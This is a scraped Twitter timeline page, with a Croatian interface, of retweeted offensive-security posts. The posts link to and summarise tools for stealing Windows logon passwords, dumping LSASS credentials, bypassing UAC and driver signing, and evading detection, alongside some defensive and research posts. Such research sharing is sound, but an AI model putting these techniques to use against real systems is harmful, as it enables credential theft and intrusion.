Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @LeetSteewie
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @LeetSteewie
-
\\??\\a.exe proslijedio/la je Tweet
FakeLogonScreen - A utility to fake the Windows logon screen in order to obtain the user's password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then saved to disk.https://github.com/bitsadmin/fakelogonscreen …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
Can your EDR detect symbolic link callback rootkits? Because ours sure as heck can't.
@aionescu and I wrote about these! https://windows-internals.com/dkom-now-with-symbolic-links/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
1\ I've written a little compiler to ship ML models as standalone Yara rules, and done proof of concept detectors for Macho-O, RTF files, and powershell scripts. So far I have decision trees, random forests, and logistic regression (LR) working. https://github.com/inv-ds-research/yaraml_rules …pic.twitter.com/sfuXEkHeNO
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
We published our research "An Overhead View of the Royal Road" (English version)
#JSAC2020#CPX360 https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html … https://github.com/nao-sec/materials/blob/master/JSAC%2BCPRCon2020/An_Overhead_View_of_the_Royal_Road.pdf …pic.twitter.com/AxfVn6dfTV
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
KDU, Kernel Driver Utility - driver loader (and not only) bypassing Windows x64 Driver Signature Enforcement with support of various "functionality" providers - including Unwinder's RTCore, https://github.com/hfiref0x/KDU pic.twitter.com/s154qYlIKR
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
RE just retired from
@hackthebox_eu. As the creator of the box, I tried to bring phishing/macro obfuscation concepts to the initial access. The intended privescs were the WinRar ACE file exploit, and XXE in Ghidra. I'll show two unintended privescs too.https://0xdf.gitlab.io/2020/02/01/htb-re.html …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
#FakeLogonScreen is a C# utility to steal a user's password using a fake Windows logon screen. This password will then be validated and saved to disk. Useful in combination with#CobaltStrike's execute-assembly command. https://github.com/bitsadmin/fakelogonscreen …pic.twitter.com/2pAOk9InLMHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
Load encrypted PE from XML Attribute. MSBuild is still the best.
https://github.com/XwingAngel/PELoader/ …
MSBuild sets Property then calls Execute.
Use this example to decouple payloads & prove that all security products have a "Single File Bias".
Decouple payloads to subvert detection.pic.twitter.com/648rujlLQn
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
in-memory traces of ppldump, exploiting zam64.sys vulndriver to dump lsass memory, cool stuff. sysmon will show a generic\noisy calltrace so detection chances here are low, if combined with lsass loading dbgcore.dll it may work. https://github.com/realoriginal/ppldump … https://github.com/SouhailHammou/Exploits …pic.twitter.com/rbXCtivW3M
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
Unwinding RTCore - response to recent Unwinder claims and behavior related to vulnerabilities found in his RTCore driver which is a part of MSI Afterburner, https://swapcontext.blogspot.com/2020/01/unwinding-rtcore.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
#Trickbot ITW is now using a brand new#UACBypass for Windows 10 machines: wsreset.exe uac bypass.#Emotet More info here: https://lolbas-project.github.io/lolbas/Binaries/Wsreset/ … https://www.activecyber.us/activelabs/windows-uac-bypass …pic.twitter.com/FR9ekFKPO1
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
Scripting with Cutter and Jupyter notebooks.https://medium.com/@duzvik/scripting-with-cutter-and-jupyter-notebooks-79d588e5fbb5 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
New Blog Post from
@Haus3c on Azure. Ryan discusses Azure and Azure AD's components, reviews some of the attacks, and release PowerZure to help understand the attacks. Link: https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a … PowerZure:https://github.com/hausec/PowerZure …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
Tracking
#aggah, after Roma225 and the RG Campaign...Our last analysis on this Threat Actor drops Lokibot
UAC Bypass: CMSTP
https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/ …
@securityaffairs@malwrhunterteam@zlab_team@yoroisecurity@VK_Intel@PaloAltoNtwks@JAMESWT_MHTHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
Some Lateral Movement Methods: -Pass the Hash/Relay ((Net-)NTLM) -Pass the Ticket (Silver/Golden) -RDP (Legit creds) -Remote Services (VNC/SSH) -(D)COM (Remote sched tasks, Services, WMI) -Remote Service Vuln (EB) -Admin Shares (PSExec) -Webshell (Chopper) -WinRM (PS Remoting)
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
Adversary Tactics : PowerShell : https://github.com/specterops/at-ps/blob/master/Adversary%20Tactics%20-%20PowerShell.pdf … (93.9 MB) Details :https://github.com/specterops/at-ps …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
Part one of "Unleashing the Power of
#AppLocker: How to Get Started and Go Beyond the Basics" begins this Wednesday! Microsoft MVP@Oddvarmoe will cover application whitelisting during his presentation and live demo.https://hubs.ly/H0mBy0Q0Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
pwndrop - The new fast & fun way to set up an HTTP/WebDAV server for your payloads is coming! python -m SimpleHTTPServer may soon be retiring. Stay tuned! Here is a quick sneak peek:pic.twitter.com/bzVV6E9oyT
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
Some study notes on LSASS hooking for harvesting interactive logon credentials. https://ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-by-hooking-msv1_0-spacceptcredentials … Thanks to
@_xpn_ for his inspiring posts about mimikatz.Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
\\??\\a.exe proslijedio/la je Tweet
#idatips Ever get a pointer to the middle of a struct? Just add the __shifted keyword to the variable's type definition!pic.twitter.com/zvYs3dTU7w
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.